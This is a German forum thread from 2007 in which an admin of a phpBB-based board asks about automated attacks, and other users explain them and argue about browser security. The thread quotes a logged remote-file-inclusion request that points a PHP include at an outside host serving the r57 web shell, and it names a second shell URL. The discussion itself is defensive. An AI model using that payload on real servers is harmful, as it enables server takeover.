Angriffe auf unser Forum Opensky.cc

[opensky.cc]

Unser Forum wird angegriffen, gestern 21 mal innert 4 Std.
Grund der Angriffe ist vermutlich, dass wir uns mit Spammerbanden angelegt haben.

Unsere Foren-Software: ORION based on phpBB

Beispiel eines Logeintrags von Caracker/Tracker:

16.06.2007, 00:15

/kb.php?sid=///includes/ kb_constants.php?module_root_path=http://secretagent.by.ru/r57.php?? libwww-perl/5.803 211.133.240.90

Auf http://secretagent.by.ru/r57.php?? liegt der Schaedling Backdoor BDS/PHP.Rst.F.3 (Avira) ACHTUNG: Der Infektionsversuch findet ohne eigene Aktion des Besuchers statt, der Aufruf der Seite genuegt!

Wir dokumentieren nun saemtliche Angriffe unter
http://forum.opensky.cc/viewtopic.php?t=93

Wir achten auf sichere Scripts und regelmaessige Updates. Unsere techn. Administratorin scheint die Situation bisher gut im Griff zu haben. Ich muss aber gestehen, dass ich von der Materie nichts verstehe.

Frage: Was koennen wir gegen die Angreifer unternehmen?

Herzlichen Dank zum Voraus
peter/admin opensky.cc

 

[Mackz]

Das sind einfach automatisierte Scripts die da ablaufen, wo pauschal nach Lücken gesucht wird um diese auszunutzen.
Wenn da nicht gerade ein Bug in dieser Richtung im phpbb existiert, habt ihr nichts zu befürchten.

gestern 21 mal innert 4 Std.

Na das ist doch garnichts. Du müsstest mal das Log vom Habo sehen.

Edit: Ich verschieb dich mal ins Webmaster-Security

 

[opensky.cc]

Danke Mackz!

Danke Mackz, das ist doch beruhigend. Wachsam bleiben wir aber auf jeden Fall!

Grss Peter

 

[Xalon]

Auf http://secretagent.by.ru/r57.php?? liegt der Schaedling Backdoor BDS/PHP.Rst.F.3 (Avira) ACHTUNG: Der Infektionsversuch findet ohne eigene Aktion des Besuchers statt, der Aufruf der Seite genuegt!

Also ich kann nur ein PHP Script erkennen das als Backdoor fungiert sollte es auf einem Server
ausgeführt werden,allerdings stimmt deine Aussage das es Besucher infiziert afaik nicht.

mfg,
Xalon

 

[fetzer]

Original von Xalon

Auf http://secretagent.by.ru/r57.php?? liegt der Schaedling Backdoor BDS/PHP.Rst.F.3 (Avira) ACHTUNG: Der Infektionsversuch findet ohne eigene Aktion des Besuchers statt, der Aufruf der Seite genuegt!

Also ich kann nur ein PHP Script erkennen das als Backdoor fungiert sollte es auf einem Server
ausgeführt werden,allerdings stimmt deine Aussage das es Besucher infiziert afaik nicht.

mfg,
Xalon

Virenprogramme schlagen trotzdem an, was die Vermutung aufkommen laesst, dass es den Computer infiziert. Alles, was die Virenprogramme erkennen ist jedoch nichts anderes als der Code der geparsten Datei, der allerdings nicht auf dem Clienten ausgefuehrt wird.
Es geht praktisch darum, dass, wenn man aufm Server solch ein Virenprogramm laufen hat, dass diese Datei eben als Schädling erkannt wird, was soweit ja auch korrekt ist.

 

[opensky.cc]

Original von fetzer

Virenprogramme schlagen trotzdem an, was die Vermutung aufkommen laesst, dass es den Computer infiziert. Alles, was die Virenprogramme erkennen ist jedoch nichts anderes als der Code der geparsten Datei, der allerdings nicht auf dem Clienten ausgefuehrt wird.
Es geht praktisch darum, dass, wenn man aufm Server solch ein Virenprogramm laufen hat, dass diese Datei eben als Schädling erkannt wird, was soweit ja auch korrekt ist.

Aha, das ist der Grund. Tasaechlich hat mein Virenscanner angeschlagen, was ich dahingehend fehlinterpretierte, dass sich der Schaedling bereits auf meinem Rechner installieren wollte.

Danke fuer die Infos und schoenes Wochenende!

peter/opensky.cc

 

[capi]

Evtl. mach es Sinn einen sicheren Browser zu verwenden (Firefox ist gute wahr). Somit sind viele XSS Attachen nicht mehr möglich.

 

[PapaJanus]

Naja. Im Themenbereich Sicherheit ist Firefox wohl ein eher ungenügendes Beispiel... (http://mywebpages.comcast.net/SupportCD/FirefoxMyths.html#Security)

Grüße

 

[bitmuncher]

Original von PapaJanus
Naja. Im Themenbereich Sicherheit ist Firefox wohl ein eher ungenügendes Beispiel... (http://mywebpages.comcast.net/SupportCD/FirefoxMyths.html#Security)

Grüße

Die Seite erzählt ja wohl mal nur Müll. Dort heißt es:

Reality - Firefox is anything but Secure with multiple unpatched vulnerabilities allowing exposure of sensitive data to local users. You only need one vulnerability to be insecure. Since Firefox v1.x was released, users have been exposed to over 150 security vulnerabilities and counting.

Als Quelle geben sie Secunia an, wo man dann folgendes lesen kann:

Secunia has issued a total of 43 Secunia advisories in 2003-2007 for Mozilla Firefox 1.x. Currently, 12% (5 out of 43) are marked as Unpatched with the most severe being rated Less critical

Fazit: Firefox hat 5 ungepatchte oder teilweise gepatchte Sicherheitslücken. Keine davon wird als besonders kritisch eingestuft.

 

[opensky.cc]

Was iss denn das, bitte?

Kann mir einer sagen, was das script auf fogender URL ausfuehren soll - die Uebernahme des Servers?

h**p://lott.by/d?

Hab den Link mit Sternchen entschaerft

Danke und Gruss, Peter

 

[Chakky]

RE: Was iss denn das, bitte?

Original von opensky.cc
Kann mir einer sagen, was das script auf fogender URL ausfuehren soll - die Uebernahme des Servers?

h**p://lott.by/d?

Hab den Link mit Sternchen entschaerft

Danke und Gruss, Peter

sieht mir nach ner php shell aus mal schnell drüber geflogen

kannst ja mal den irc server joinen^^

//hab noch im code ne email addy gefunden kannst ja reinschreiben^^

tipp zum besser lesen quelltxt anzeigen lassen